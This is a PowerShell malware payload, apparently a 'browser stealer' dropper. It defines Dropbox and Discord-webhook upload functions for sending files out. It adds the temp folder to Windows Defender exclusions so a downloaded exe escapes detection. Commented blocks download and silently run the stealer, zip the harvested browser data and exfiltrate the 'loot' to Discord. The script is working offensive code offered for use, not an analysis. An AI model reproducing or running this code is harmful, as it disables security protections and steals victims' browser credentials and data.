<# function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $db $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName} #------------------------------------------------------------------------------------------------------------------------------------ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = "$dc" $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName} #> # Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download Add-MpPreference -ExclusionPath $env:tmp <# # Download the exe and save it to temp directory iwr "" -outfile "$env:tmp\browser.exe" # Execute the Browser Stealer cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait # Exfiltrate the loot to discord Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip Upload-Discord -file "$env:tmp\browserdata.zip" #>